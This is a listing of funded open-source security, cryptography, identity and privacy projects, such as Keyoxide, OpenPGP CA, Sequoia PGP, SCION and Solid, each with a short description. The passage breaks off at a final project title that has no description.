Keyoxide is a new type of service to allow proving linked account ownership on a variety of platforms. Keyoxide levers existing and battle-tested cryptographic primitives. The goal is to give users more control over their online presence, independent from dominant internet actors - without in fact having to depend on any centralised services or third parties. The project will improve the usability of the current Keyoxide, and its emerging underlying technology (Decentralized OpenPGP Identity Proofs). More service providers will be added and additional tools to provide proofs will be developed, to create a smooth and easy onboarding process for less tech-savvy people.

>> Read more about Keyoxide

Private Key Operations for Keyoxide — Implement Private Key Store design in Keyoxide

Keyoxide is one of the open-source success stories when it comes to providing an alternative to the proprietary product (Keybase). The UI is straightforward so that the interaction with the site is available to all kinds of users. Unfortunately there is one critical part that differentiates Keyoxide from Keybase - no support for private key operations. Adding proofs requires a complex maze of command line invocations. This project will implement best of both worlds: simple, UI centric way of interaction without technical knowledge required and the strong security of Keyoxide.

>> Read more about Private Key Operations for Keyoxide

Keyoxide v2 — Add cryptographic signature based to Keyoxide

How do you discover which other online accounts across different services and service providers actually belong to the same person? Keyoxide is a secure, privacy-friendly and decentralized platform to manage online identities, uncompromisingly driven by what the user herself wants to share.

Keyoxide is a new type of service to allow proving linked account ownership on a variety of platforms. Keyoxide levers existing and battle-tested cryptographic primitives. The goal is to give users more control over their online presence, independent from dominant internet actors - without in fact having to depend on any centralised services or third parties. The project will build on top of the existing OpenPGP Identity Proofs to add other types of profiles based on various cryptographic signature mechanisms from a variety of new tools. To maintain linkable profiles, a new signature-hosting infrastructure needs to be designed and developed. Other improvements are aimed at safeguarding privacy and achieving plausible deniability.

>> Read more about Keyoxide v2

DNSSEC Key Signing Suite — A best practise for DNSSEC Key Signing

DNSSEC provides trust in the DNS by guaranteeing the authenticity and integrity of DNS responses. As DNS is of fundamental importance to most Internet communication, this is a vital function that needs safeguarding. Beyond providing trust in the DNS, DNSSEC is a key enabler for other technologies that improve the security, privacy and trust of Internet users. In the DNSSEC Key Signing Suite project we build a set of tools, scripts and guidelines (a playbook) to facilitate simple key signing with a standardised ceremony that has automated checks and audits where possible. The impact of this will be twofold. First, it leads to reliable, predictable and verifiable key ceremonies, which improves the trust in DNSSEC. Second, it will significantly ease the burden of operation, bringing the use of a validated and trustworthy signing procedure within reach for many more DNSSEC operators than today (e.g. smaller or less profitable top-level domain operators).

>> Read more about DNSSEC Key Signing Suite

Improve Email Encryption in KMail — Adopt improvements in Email Encryption in KMail

The goal of this project is to make it more simple for inexperienced users to just use encrypted mails, at the click of a button. Autocrypt is a new method for email encryption, that needs nearly no user interaction. It performs the needed key exchange transparently in the background, and does key management automatically. Encrypted Headers is a protocol to send mail headers in the encrypted mail part. Traditional encryption methods leaked meta-data, which could be used for mass surveillance purposes. The result will be part of the KDEPIM codebase, so you don't have to install anything else than KMail to use these improvements.

>> Read more about Improve Email Encryption in KMail

ARPA2 LDAP Middleware — Privacy enhancing middleware

Some protocols are far better known than others. Everyone will recognise the HTTP protocol we use to transfer web pages. LDAP is not as well known, but it is also a key technology we use on a daily basis - in fact it shapes how most organisations are organised online. LDAP is a proven technology but can be cumbersome to work with, and as a result it has seen little innovation in recent years.

This project develops a number of innovatie middleware components from the ARPA2 project. This includes a privacy enhancing middleware for LDAP (LEAF), which allows to do attribute filtering and selectively transforming of LDAP; SteamWorks, which allows for responsive large scale configuration and trust delegation; and Lillydap, a library that can be used to easily add LDAP to any application. The project also delivers on (broad)er deployability of these building blocks, by providing tools for distropackaging the innovative solutions produced by the project.

>> Read more about ARPA2 LDAP Middleware

LDAP Synchronization Connector — Synchronize data from/to various data sources with LDAP

LSC (LDAP Synchronization Connector) is a community open source software designed to get rid of all customized scripts developed by system admistrators to sync their files or databases to maintain accounts and groups in an LDAP directory. LSC works with one configuration file and can connect to any database, LDAP directory (including Active Directory) or REST API. It solves use cases like "create an account for every new people hired in the company", "lock this account in Active Directory because it was locked in OpenLDAP", "create a group for all people of this department" or "push accounts to this application API". The project will refresh all the dependencies, and add new features such as allowing javascript in LDAP filters.

>> Read more about LDAP Synchronization Connector

SCIM integrations — System for Cross-domain Identity Management (SCIM)

Most organizations have a digital work environment that is composed of many applications. With a Single Sign-on (SSO) system they get a unified login and logout experience, but there is a catch. Traditional SSO protocols like OpenID Connect do not support syncing user profiles across applications. For instance, users are deleted in the SSO, but not in the applications. Hence, SSO implementations are not GDPR compliant by default, and organizations have to develop custom process to circumvent violations. SCIM is a standard developed within the Internet Engineering Task Force designed to solve exactly that. The project is to develop a SCIM client for Keycloak and a SCIM service provider for Nextcloud, RocketChat, Matrix and Stackspin.

>> Read more about SCIM integrations

MoboSearch — Providing an alternative view on the Android App ecosystem

Mobile phones play a major role in our society, yet they still suffer from severe limitations in how they handle apps. As a result, most people are unaware of the dangers of privacy leaks and are typically offered very constrained search capabilities within one single source of information, the app store. MoboSearch is a new search engine and information portal for apps, empowering users beyond the existing app stores. The system exposes privacy and security information, like app permissions, and gives users new easy and flexible search capabilities that allow to make an informed choice and to increase people's awareness. Openness and interoperability ensure that the system can offer and receive data, so to cooperatively enable a better and healthier app ecosystem.

>> Read more about MoboSearch

Distributed Trust for Web Servers — Establishing a Distributed Trust Authority

The M-Pin protocol, and its implementation in the Milagro project currently incubating at Apache, provides cryptographic security using a distributed trust model. In place of the single point of failure (and high-value target for social engineering attacks) of today's Certificate Authorities (CAs), cryptographic verification is assembled from two or more mutually independent authorities, all of which would need to be subverted at once to break security. This project helps bring distributed trust to the Web, by implementing M-Pin support via Milagro's libraries in leading Open Source web servers. This will pave the way both to a distributed trust alternative to monolithic CAs and browser trust lists, and to a distributed trust alternative to protocols such as OpenID for user identification.

>> Read more about Distributed Trust for Web Servers

MTE - the MirageOS Taler Exchange — Implement Taler Exchange functionality in OCaml-based unikernel

This project will develop a drop-in implementation for a GNU Taler exchange with the unikernel framework MirageOS. The GNU Taler Exchange is a service that needs to be robust and high secure (plus allow very high security deployments). MirageOS uses OCaml, a functional programming language with a static type system which catches lots of errors at compile time, and provides memory-safety. With MirageOS, one only embeds the code that is really required to run the service in the virtual machine image - resulting in a relatively much smaller attack surface.

The resulting solution will use very little resources (memory usage / CPU cycles), which is beneficial both from a green computing perspective, and from a performance perspective. The plan is to use existing tests of GNU Taler exchange, in addition to our own fuzz testing, to ensure that MTE acts the same as GNU Taler exchange.

>> Read more about MTE - the MirageOS Taler Exchange

Namecoin: Core Infrastructure — Alternative domain name system

Namecoin is a blockchain project that provides a decentralized naming system and trust anchor. Our flagship use-case is a decentralized top-level domain (TLD) which is the cornerstone of a domain name system that is resistant to hijacking and censorship. This project is meant to improve the security and usability of core components of Namecoin.

>> Read more about Namecoin: Core Infrastructure

Namecoin: ZeroNet and Packaging — Make ZeroNet work with Namecoin

Namecoin provides a decentralized naming system and trust anchor. Its flagship use-case is a decentralized top-level domain (TLD) which is the cornerstone of a domain name system that is resistant to hijacking and censorship. Among other things, this provides a decentralized trust anchor for Public Key Infrastructure that does not require third party trust. It operates independent from the DNSSEC root trust chain, and can thus offer additional security under some circumstances. ZeroNet is a decentralized web-like network of peer-to-peer users, which provides an alternative to TOR hidden services. In the project, Zeronet will be adapted to support a local Namecoin client, and provide additional assurances such as a Host Header-like mechanism to protect users from spoofing. Namecoin will be used as a human-readable naming layer for Tor onion services and ZeroNet sites. This eliminates the user problem of pseudorandom, unmemorable website addresses for onion services and ZeroNet sites, which can facilitate phishing attacks.

>> Read more about Namecoin: ZeroNet and Packaging

NixOS/Clevis — Unattented disk decryption with Clevis on NixOS

Whether they should or not, organisations are moving their data to third party servers (aka the "cloud"). While full disk encryption of servers should be an everywhere standard in order to protect the sensitive data that they inevitably hold, its adoption is still lagging. This isn't just lack of awareness, but also part of the tooling is missing. With full disk encryption comes a big pain point: restarting the server needs for the root file system to be unlocked before booting the OS.

While it is possible to remotely log into a server to unlock it remotely, this does create a dependency on a human operation in order to boot a server without compromising security. This is sometimes a non-acceptable drawback : it rules out unattended reboots, recovery from power loss, and it doesn’t scale well with the number of servers.

This project will make on disk encryption with remote unlocking part of NixOS - bringing together a number of innovative mechanisms such as system extensions images and stage1-networkd. While this does not make using the cloud safe and private in and by itself (this is impossible), it will contribute to make it somewhat more safe and more private.

Additionally the project will port the Proxmox Hypervisor on NixOS, in order to benefit from NixOS-style declarative host configuration and deployment (which is very valuable when managing a cluster of machines to avoid configuration rot). ProxMox is a hypervisor that can run little to middle sized VM clusters and is capable of handling multi-node clusters.

>> Read more about NixOS/Clevis

Securing NixOS services with systemd

NixOS, with the nix package manager, provides different services that can be installed and configured in a reproducible, declarative way. But how does one know whether software sticks to what it is supposed to do, and prevent a malicious application to spy on others?

Systemd provides users with ways to specify fine-grained sandboxing options for their running service, taking advantage of the Linux kernel's security facilities. This project will improve the default configuration of the services that are available in NixOS using systemd, so that users may deploy services without granting them too much trust: the services would only have access to the parts of the system they require. From a security point of view, this limits the attack surface of the system and improves a lot of defense in depth. This also means that services wouldn't be able to snoop on all of the user's system.

To gain long-term benefits from this project, we will develop automated tools to help with finding the right configuration for a given service, and we will write documentation to help people who will want to secure other services with their task.

>> Read more about Securing NixOS services with systemd

Nym Credentials — A decentralised solution for authentication

Nym Credentials provides open-source code for privacy-enhanced authentication and authorization in a decentralized environment. Today, when using "single-sign in" solutions, users hand over their personal data to third-party identity providers such as Facebook Connect and Sign-In with Google. Nym Credentials tackles this problem by allowing users to securely authenticate and transfer personal data (and proofs of private data) while maintaining privacy without a centralized identity provider. Each credential is cryptographically unlinkable between usages and multiple decentralized identity providers can verify this data. Open-source Nym credential libraries can be easily integrated into existing services, with a focus on federated and decentralized European environments.

>> Read more about Nym Credentials

Opaque Sphinx — Secure password-based authentication with Opaque/Sphinx

Opaque Sphinx is a project that aims to secure password-based authentication by deploying the state-of-the-art SPHINX and OPAQUE cryptographic protocols to eliminate almost all common attack vectors - such as weak guessable passwords, password reuse, phishing, password databases, offline dictionary attacks, database leaks - plaguing current solutions. These protocols provide the strongest available cryptographic properties with cryptographic proofs. The project intend to port its already existing free software SPHINX implementation - besides already existing support for Linux and Windows - to Android so it can also be used on smartphones.

>> Read more about Opaque Sphinx

Opaque Sphinx Server and Clients — Server and tools for modern authentication

Passwords are probably the most common way to remotely use private services, which makes them a major liability - humans on average find it very hard to memorize strong passwords. Luckily, passwords - or more particularly tools to work with passwords more safely - are evolving as well. SPHINX is a novel approach to password storage that is information theoretically secure. And unlike most online password managers, the user does not even have to trust the server. OPAQUE is a novel protocol that can be used to eliminate phishing as an attack vector when authenticating to servers. The combination of SPHINX and OPAQUE provides some very strong guarantees while still allowing users to only need to remember one or just a few passwords. This project will develop a SPHINX server in a safe, compiled language, with ample tests. It will also further develop and refine a protocol above SPHINX, handling creation, deletion, backup and changing of data. In addition it will add the OPAQUE protocol to various free software ecosystems such as PHP, java, nodejs, ruby, golang, erlang and rust, as well as to the two most used webservers: nginx and apache2.

>> Read more about Opaque Sphinx Server and Clients

OpenPGP Certificate Authority — Managing OpenPGP keys for communities and organisation

OpenPGP CA is a tool for managing OpenPGP keys within an organization. Its primary goal is to make it trivial for end users to authenticate the OpenPGP keys of users in their organization, and in adjacent organizations. In an OpenPGP CA-using organization, users delegate authentication to an in-house CA. This allows users to securely and seamlessly communicate via PGP-encrypted email without having to manually compare fingerprints, without having to understand OpenPGP keys or signatures, and without having to trust a third-party with potentially conflicting interests. This goal is achieved by shifting the authentication burden from individual users to an organization's administrator, and providing a tool that largely automates key creation, and signing as well as key dissemination. Importantly, because OpenPGP CA works within the existing OpenPGP framework, users do not need any new software to take advantage of OpenPGP CA's benefits; they can continue to use existing email clients and encryption plugins. Further, OpenPGP CA can co-exist with other authentication approaches, like traditional key signing workflows.

>> Read more about OpenPGP Certificate Authority

Hardening OpenPGP CA deployments — HSM support for OpenPGP key infrastructure

OpenPGP CA is a tool for managing and certifying OpenPGP keys in organizations. Today, the private key material of OpenPGP CA instances is stored and used locally. This project will add support for two hardened modes of operation: 1) Using a hardware-token OpenPGP Card) based key for the CA, and 2) Split OpenPGP CA deployments, in which critical operations are performed on a highly protected machine (e.g. air-gapped), while regular operation can take place conveniently on an online CA instance.

In addition the project will build an OpenPGP CA based tool for version control signing workflows (e.g. git), with a focus on providing a smooth user experience for signing with OpenPGP card devices.

>> Read more about Hardening OpenPGP CA deployments

Interoperable Certificate Store for OpenPGP — Standardisation effort for shared OpenPGP certificate storage

This project will build a public cert store for OpenPGP keys, with well defined data structures and access mechanisms to facilitate interoperability between OpenPGP implementations. It builds on pgp-cert.d, which stores certs, and has an API to access them. Beyond the common format and API, the project will also add Sequoia-specific indices, where standardization doesn't make sense. sq, Sequoia's command line tool, will be adapted to use the cert store. In addition the project aims to develop a privacy-preserving way to update the certs from keyservers.

>> Read more about Interoperable Certificate Store for OpenPGP

Improving OpenSSH's Authentication and PKI — Improving SSH Authentication with OpenPGP transitive trust

It would not be a stretch to say that ssh secures the Internet - it is the protocol most relied on to log into servers of any type. Yet, its authentication model is inflexible, rarely used properly, and inadequate. OpenPGP's transitive trust (aka "web of trust") mechanisms and revocation certificates can help to provided additional automated assurances. By publishing and certifying OpenPGP keys for servers, an ssh client may be able to automatically check whether an encrypted connection is not only encrypted, but also authenticated. Similarly, server administrators can automatically find the right public key for users. And when a server key or user key is compromised, using OpenPGP, it is straightforward to ensure that it won't be trusted: just publish a revocation certificate. This project will add OpenPGP support to OpenSSH to improve and simplify these workflows.

>> Read more about Improving OpenSSH's Authentication and PKI

Owncast — ActivityPub powered Livecasting

Owncast is a self-hosted, open source live streaming platform for people to easily host and manage their own live streams. It has become an increasingly popular option for many people to break away from the large centralized services. The project will add Fediverse (ActivityPub) integration in order to provide better means of discovery, increase engagement, and to have interoperability with other applications. The goal is for Owncast to become a fully fledged member of the Fediverse, focusing on people's streams being discovered with existing timelines and search indexes. This would allow people to for instance contribute comments directly from their own ActivityPub powered website or ActivityPub-powered link aggegators like Lemmy.

>> Read more about Owncast

Peppol for the masses — Hybrid self-hosted e-invoicing with decentralized identities

Peppol is an EU-backed e-Invoicing network which uses a top-down certification infrastructure to establish trust between the sender and the receiver of an invoice. In the "Peppol for the Masses!" project, we will implement Peppol in PHP (so far only Java and C# implementations are available), and package its core components (the AS4 sender and the AS4 receiver) as a Nextcloud app, so that users of the popular Nextcloud personal cloud server can send and receive invoices over AS4 directly into their self-hosted server.

Due to the top-down nature of Peppol's trust infrastructure, it's not possible to self-host a node in the Peppol network unless you go through a reasonably heavy certification process. Therefore, we will extend our implementation with support for self-hosted identities, using the "WebID" identity pattern which was popularized by the Solid project. We will also develop a re-signing gateway which replaces the signature on an AS4-Direct invoice with a Peppol-certified signature. In a follow-up project, we will also host an instance of this re-signing gateway and make it available free of charge, similar to how the LetsEncrypt project has made TLS certificates available free of charge.

This project will lower the (cost) barrier for machine-readable cryptographically-signed e-Invoicing messages, and at the same time increase the sovereignty of end-users, towards a human-centric internet of business documents.

>> Read more about Peppol for the masses

Adding Web-of-Trust Support to PGPainless — Web-of-Trust specification support for Java

Reliable authentication of public key certificates is a hard requirement for strong and effective end-to-end encryption. The "Web-of-Trust" (WoT) serves as an example of a decentralized authentication mechanism for OpenPGP. While there are some existing implementations of the WoT in applications such as GnuPG, their algorithms are often poorly documented. As a result, WoT support in client applications is often missing or inadequate.

PGPainless is an easy-to-use, secure-by-default OpenPGP library for Java and Android. This project will extend PGPainless with an implementation of a recently published, new Web of Trust specification. The goal is to make the Web of Trust more interoperable and accessible to client applications, overall increasing the usability and ergonomics of OpenPGP for the end-user.

>> Read more about Adding Web-of-Trust Support to PGPainless

Privacy Enhancements for PowerDNS and DNSdist — Make it easier to deploy private DoT/DoH resolvers

DNS over TLS (DoT) and DNS over HTTPS (DoH) are two recent developments in the DNS field, and currently these are dominated by US based providers. The project will enhance the availability of open, trustworthy, privacy respecting DNS Resolvers in such a way that it allows any DNS provider, operator, or user to provide encrypted DNS service. This project aims to speed up implementation, improvement and standardisation of the most important Privacy enhancing features of DNSdist and PowerDNS resolvers to allow for the entire DNS-chain (from client, to caching-resolver, to authoritative nameserver) to be encrypted. The project will add support to the (open source) PowerDNS components (dnsdist, recursor and Authoritative server) for the privacy features necessary.

>> Read more about Privacy Enhancements for PowerDNS and DNSdist

Prosody IM — Implement SASL authentication mechanism for XMPP

XMPP is the most widely deployed standard protocol for real-time messaging today, and is a very popular choice among individuals and organizations who wish to manage their own internet communications, instead of submitting to other (e.g. commercial/data-driven) communication platforms. For an XMPP user to log in to their account today, two things are required: a username and a password. This has remained unchanged for many years, while other technologies have been steadily advancing to support security-enhancing features such as multi-factor authentication or even self-sovereign identities.

XMPP uses an authentication umbrella standard known as SASL to authenticate all connections.The way XMPP integrates SASL is defined in RFC 6120 and assumes a very simple challenge-response flow, which has worked well in allowing us to upgrade the network from older SASL mechanisms such as DIGEST-MD5 and onto more modern mechanisms such as SCRAM-SHA-1 and SCRAM-SHA-256.

To gain new authentication features beyond simple password authentication, we need to evolve XMPP’s relationship with SASL. This project will deliver just that, and will be the first complete implementation of a proposed standard (XEP-0388: Extensible SASL Profile) into the popular Prosody XMPP server. It will also implement support for per-session access control throughout Prosody, and support for XEP-0386 (Bind 2.0).

>> Read more about Prosody IM

Python bindings to the rattler library

Rattler is a Rust-based library to interact with the conda package ecosystem (which provides binary, cross-platform software packages for Windows, macOS and Linux). Rattler makes it easy to resolve package dependencies with a SAT solver, download the packages, and create virtual environments on the user’s computer.

This main focus of this project are the py-rattler bindings, that give users the power to use rattler from Python, to create virtual environments programmatically. Furthermore, py-rattler will be used by other tools in the ecosystem such as the bot infrastructure that powers “conda-forge”, the largest open source repository in the conda universe.

>> Read more about Python bindings to the rattler library

Rauthy — Reliable OpenID Connect IdP and IAM solution.

Rauthy is a lightweight and easy to use OpenID Connect Identity Provider. It aims to be simple to both set up and operate, with very secure defaults and lots of config options, if you need the flexibility. It puts heavy emphasis on Passkeys and a very strong security in general. The project is written in Rust to be as memory efficient, secure and fast as possible, and it can run on basically any hardware. If you need Single Sign-On support for IoT or headless CLI tools, it's got you covered as well. You get High-Availability, client branding, UI translation, a nice Admin UI, Events and Auditing, and many more features. By default, it does not depend on an external database but runs on top of Hiqlite, an embeddable SQLite database that can form a Raft cluster to provide strong consistency and high availability - although it can use e.g. Postgres as an alternative. This makes it simple to operate, while scaling up to millions of users easily.

>> Read more about Rauthy

Redwax — Standardisation of client side PKI interfaces

The internet was not designed as a public infrastructure and most of the engineering trade-offs of the lower-layer technologies have generally erred on the side of accommodating fast growth and ease rather than values such as security, confidentiality and privacy. Yet today the internet is everywhere from providing a place for democratic discourse to healthcare to finance and personal communication. Redwax aims to decentralise trust management so that the values security, confidentiality and privacy can be upheld in public infrastructure and private interactions. The overarching goal of Redwax is to strengthen the existing technologies and infrastructure by providing a modular and practical set of tools to manage public key based trust infrastructures as currently used. These tools capture and hard code a lot of industry best practice and specialist PKI knowledge so that they can be put into the hands of a much wider community than currently served by a few specialist industries. With this project the Redwax team hopes to help re-establish (and/or strengthen) the support for these non-centralized trust management technologies inside web browsers and other relevant applications by working with standards organizations and industry coordination groups, and to create the initial reference implementations for their standardisation.

>> Read more about Redwax

Reproducible F-Droid — Building a trusted app ecosystem with F-Droid

F-Droid maintains a complete free software build/sign/deploy stack for securely making signed releases of Android apps in a fully automated way. This has been used since 2010 to run the f-droid.org repository of free software Android apps. Reproducible builds means it is possible to make a strong link between the actual app running on our devices, and the source code which they were built from. When the source code has been thoroughly inspected and is trusted, it is then possible to apply that same trust to the install binary.

This project will make this stack much easier for other people and organizations to deploy and use on a daily basis. This allows organizations to run rebuilders to confirm that the releases available on f-droid.org or any F-Droid-compatible repository exactly match the source code. The resulting data can then be automatically consumed by the client app so it can communicate to the user that it was confirmed as a reproducible build.

>> Read more about Reproducible F-Droid

Robur private DNS resolver and DHCP server — Secure network configuration and DNS resolution

DHCP and DNS are fundamental Internet protocols, DHCP is used for dynamic IP address configuration in a local network, DNS for resolving hostnames to IP addresses. In this project, we develop a robust DHCP server and DNS resolver as a MirageOS unikernel. MirageOS unikernels are self-contained virtual machine images which are composed of the required OCaml libraries, leading to a binary with a minimal trusted code base, and thus minimized attack surface. The choice of the memory-safe, functional, and statically typed language OCaml avoids common attack vectors, such as buffer overflows and double frees. MirageOS unikernels can be deployed on various hypervisors (Xen, KVM, BHyve), microkernels (Genode, Muen), or as Unix binary (also with seccomp rules that allow only 10 system calls) on x86-64 and arm64. Several DHCP and DNS privacy extensions, extensive testing, and documentation is worked on to allow everyone to use it on their home router or in the data center. Migration of existing configuration (e.g. dnsmasq) to Robur DNS resolver and DHCP server will be provided as well.

>> Read more about Robur private DNS resolver and DHCP server

Rocket CWMP — Remote governance and configuration for internet equipment

CWMP (CPE WAN Management Protocol) or TR-069 is a technical specification of a Broadband Forum designed for remote governing of a CPE. CWMP is a standardized and widely-used text-based protocol enabling communication between CPE and Auto Configuration Server (ACS).

Rocket CWMP is a modular CWMP-client capable of supporting TR-069, TR-181 and other technical reports. The project was started out of an industry gap regarding a production-ready, FOSS solution that meets the ISP requirements and the feature and security requirements of modern embedded devices. It is capable of integrating into existing solutions for automatic and remote software installation or provisioning of CPEs. The client is designed to be easily portable to different Linux platforms (OpenWrt and other Linux distributions such as Yocto, Debian, Ubuntu and others). Its modularity implies that developers can easily build new features based on their requirements. It would serve as a light weight glue between CWMP and embedded Linux software standards for configuration and statistics.

The end goal of this project would be to create and FOSS delivering mandatory remote management features in ISP ecosystem. ISPs would finally be equipped with a CWMP client that: a) is an open and extendable replacement of the closed software alternatives, b) is designed to easily include and configure various backend systems and c) allows replacing proprietary firmware and leveraging Open Source components.

>> Read more about Rocket CWMP

SASL Works for the InternetWide Architecture — Integrate new authentication mechanisms into SASL

The SASL Works allow clients to use authentication mechanism that meet their requirements, and use it in virtually all protocols, which includes but is not limited to the web. Servers on the other hand, can flexibly adapt to clients from any domain, by backporting authentication inquiries to the client's own realm for the desired level of approval. Once configured, this process frees service providers from the need to manage user accounts and secure storage of credentials. Clients finally get a choice to use strong cryptographic authentication mechanisms instead of being forced to use a site programmer's poor approach to security. This in turn is helpful for setting higher levels of security policies in formal bodies such as organisations and governments, while generally simplifying the user interaction.

>> Read more about SASL Works for the InternetWide Architecture

Geographic tagging of Routing and Forwarding — Geographic tagging and discovery of Internet Routing and Forwarding

SCION is the first clean-slate Internet architecture designed to provide route control, failure isolation, and explicit trust information for end-to-end communication. As a path-based architecture, SCION end-hosts learn about available network path segments, and combine them into end-to-end paths, which are carried in packet headers. By design, SCION offers transparency to end hosts with respect to the path a packet travels through the network. This has numerous applications related to trust, compliance, and also privacy. By better understanding of the geographic and legislative context of a path, users can for instance choose trustworthy paths that best protect their privacy. Or avoid the need for privacy intrusive and expensive CDN's by selecting resources closer to them. SCION is the first to have such a decentralised system offer this kind of transparency and control to users of the network.

>> Read more about Geographic tagging of Routing and Forwarding

SCION-RAINS — RAINS, Another Internet Naming Service (or, a DNS alternative)

RAINS (which recursively stands for RAINS, Another Internet Naming Service) is an alternative name resolution protocol that has been designed with the aim to provide an ideal naming service for the SCION Internet architecture. SCION is one of the most ambitious and realistic alternative Internet architectures currently in play, and has interesting traits such as route control, failure isolation, multipath capabilities and explicit trust information for end-to-end communication.

The RAINS architecture is simple but effective, while it resembles the architecture of DNS it also benefits from being a clean-slate design and provides security across all TLD's - where DNS with DNSSEC fails to provide such capabilities across the board. RAINS, unlike DNS, has no relative clocks: the DNS TTL is replaced by the absolute validity timestamps on the signature. All records are signed.

>> Read more about SCION-RAINS

Subliminal Messaging — Embedded secure channels within traditional and internet telephony

Most of todays telephony consists of digital transmissions, so given a codec without mangling or added noise, it becomes possible to treat (part of) that as a data channel, and pass meaningful data through it while maintaining an acceptable noise floor to the sound being transmitted. That data channel can give rise to information exchange, including key material and alternative contact options.

The project will work on various improvements that connect telephony and digital communication: (1) VPN setup with telephony protocols, (2) data communication over the PSTN backbone and its extensions into VoIP, (3) digital security for PSTN and VoIP calls.

>> Read more about Subliminal Messaging

Secure Web Tokens for Linux — TPM 2.0 backed FIDO2/U2F tokens on Linux

This project aims to develop a systemd daemon that utilizes the TPM 2.0 security chip to provide FIDO2/U2F tokens for web browsers and operating system applications on Linux. Leveraging the ubiquitous presence of TPM2 in modern PCs, the daemon will enhance security and usability for Linux users. It will allow the integration of security chips as access tokens with web extensions, secure local passwords and HOTP/TOTP managers, and enable hardware-based lock screen authentication mechanisms.

The daemon will interface with the TPM2 chip to manage FIDO2 token generation. It includes support for the "uhid" kernel driver for button press emulation when no fingerprint reader is available for authentication. The project involves developing the daemon, ensuring seamless integration with systemd, and conducting extensive testing for functionality and security. Comprehensive documentation will be provided for setup and use, along with user guides for web extension integration. The outcome will be a robust, secure, and user-friendly solution for Linux users, elevating the baseline security and leveraging existing hardware capabilities to the fullest.

>> Read more about Secure Web Tokens for Linux

SeedVault Integrity — Add integrity checking and WebDAV support to SeedVault Android backups

SeedVault Backup is an independent open-source app data backup application for Android and derived mobile operating systems. By storing Android users' data and files in a place the user chooses, and by using client-side encryption to protect backed-up data, SeedVault offers users maximum data privacy and resilience with minimal hassle.

SeedVault uses Android's storage access framework (SAF) to read and write encrypted app data. This allows it to backup and restore application data on a wide range of platforms (such as Nextcloud) and even USB flash drives.

The project will improve the current implementation to allow storing files also on generic WebDAV-based storage without the SAF abstraction layer for improved performance and reliability. It will be possible to decide what apps and files should be restored and to verify the integrity of the backups made.

>> Read more about SeedVault Integrity

SelfPrivacy — Reproducible self-hosting stack based on NixOS

Self-hosting can be a challenge even for a professional, let alone an unprepared user. We want to change that. SelfPrivacy is a free application that helps you set up and manage your self-hosted services. Our goal is to create an accessible tool that gives everyone an opportunity to create their own self-hosted infrastructure.

Our application supports multiple platforms and to use it, all you need is to register with a provider and copy the access token into the application. SelfPrivacy will set up the system, domain, DNS and install open source services such as E-Mail, Nextcloud, Jitsi, etc. SelfPrivacy automates the entire lifecycle: provisioning, updates, configuration changes, monitoring, backups and space management.

We encourage the use of private services that we provide, and we also develop infrastructure based on the NixOS distribution.

>> Read more about SelfPrivacy

A Secret Key Store for Sequoia PGP — Standards-compliant private key store for OpenPGP

This project implements a private key store for Sequoia, a new OpenPGP implementation. Currently, Sequoia-using programs use private keys directly. A private key store mediates applications' access to private keys, and offers three major advantages relative to the status quo. First, a private key store is in a separate address space. This means that private keys that are in memory are in a different address space from the application. This was underlying cause of the Heartbleed vulnerability. Second, a private key store can provide a uniform interface for accessing keys stored on different backends, e.g., an in-memory key, a key on a smart card, or a key on a remote computer, which is accessed via ssh. This simplifies applications. Third, this architecture simplifies sharing private key material among multiple applications. Only the private key store needs to worry about managing the private key material, which improves security. And, when a user unlocks a key in one application, it is potentially unlocked in all applications, which improves usability.

>> Read more about A Secret Key Store for Sequoia PGP

Adding TPM Support to Sequoia PGP — Implement use of TPM 2.0 crypto hardware for OpenPGP

Protecting cryptographic keys is hard. If they are stored in a file, an attacker can exfiltrate them - even if the harddrive is encrypted at rest. A good practical solution is a hardware token like a Nitrokey, which stores keys and exposes a limited API to the host. For most end users, a token is a hassle: one needs to carry it around, it needs to be inserted, and it is not possible to work if it is left at home. And, it needs to be purchased. There is a better solution, which doesn't cost anything. A trusted computing module (TPM) is like an always-connected hardware token only more powerful (the keys can be bound to a particular OS installation, it can store nearly an unlimited number of keys, not just three) and TPMs are already present in most computers. This project will add support for TPMs to Sequoia PGP including comprehensive test suites and in-depth documentation for both software engineers: as an API and end-users as a way to use TPM bound keys through Sequoia's command-line interface (sq) for decryption and signing.

>> Read more about Adding TPM Support to Sequoia PGP

SignRoom — Zenroom based signature and credential platform

Leveraging the quantum-proof cryptographic implementation done in Zenroom (along with Zenroom's other cryptographic flows) we are developing a simple to use web-based platform, allowing users to sign and verify messages and documents (PDF, Office files, pictures etc) using quantum proof signature, ecdsa signature and schnorr signature and multi-signatures. Document signatures are stored inside the document using the PADES and XADES protocols. The tool will also produce and verify zero-knowledge proof credentials, W3C-VC credentials for signature and verification. The platform is built as a PWA, is mobile friendly, has APIs for third party integration a library to integrate into mobile applications along with bindings for multiple programming languages.

>> Read more about SignRoom

Solid Application Interoperability

Solid Application Interoperability specification details how Agents in the Solid ecosystem can read, write, and manage data stored in a Solid pod using disparate Applications, either individually or in collaboration with other Agents. Solid is a specification that lets people store their data securely in decentralized data stores called Pods. Pods are like secure personal web servers for data. When data is stored in someone's Pod, they control which people and applications can access it. Solid was initiated and is currently led by the inventor of the World Wide Web, sir Tim Berners-Lee. Solid Application Interoperability provides clear way to create intuitive data boundaries and higher level patterns to manage access to that data following the principle of least privilege. Specification is accompanied by a primer and sample implementations.

>> Read more about Solid Application Interoperability

Solid Application Interoperability — Interoperable Data sharing flows and discovery for Solid

Solid Application Interoperability specification details how Agents in the Solid ecosystem can read, write, and manage data stored in a Solid pod using disparate Applications, either individually or in collaboration with other Agents. Solid is a specification that lets people store their data securely in decentralized data stores called Pods. Pods are like secure personal web servers for data. When data is stored in someone's Pod, they control which people and applications can access it. Solid Application Interoperability provides clear way to create intuitive data boundaries and higher level patterns to manage access to that data following the principle of least privilege.

The focus of this project is on three parts: i18n for the Authorization Agent, data sharing flows and verifying WebID of social peers.

>> Read more about Solid Application Interoperability

Solid Wallet — Authorization reasoning, rule-based controls and fluid integration for Solid

Solid Apps display information collected by following linked data across the World Wide Web, writing changes to Solid Personal Online Data Stores (PODs). Following links can land an App on a protected resource somewhere on the Web, accessible only to a select group of actors specified in an associated Web Access Control Resource. Solid Wallet aims to build core libraries to reason over Solid Access Control Rules, limit access to what clients can request, publish keys and sign transactions. The same libraries will also be useable by servers to verify such claims. Finally, we will use these libraries to build a flexible prototype Wallet for Solid apps that run in the browser or server.

>> Read more about Solid Wallet

Dual-level Specification Inference — Make formal verification more practical with dual-level Specification Inference

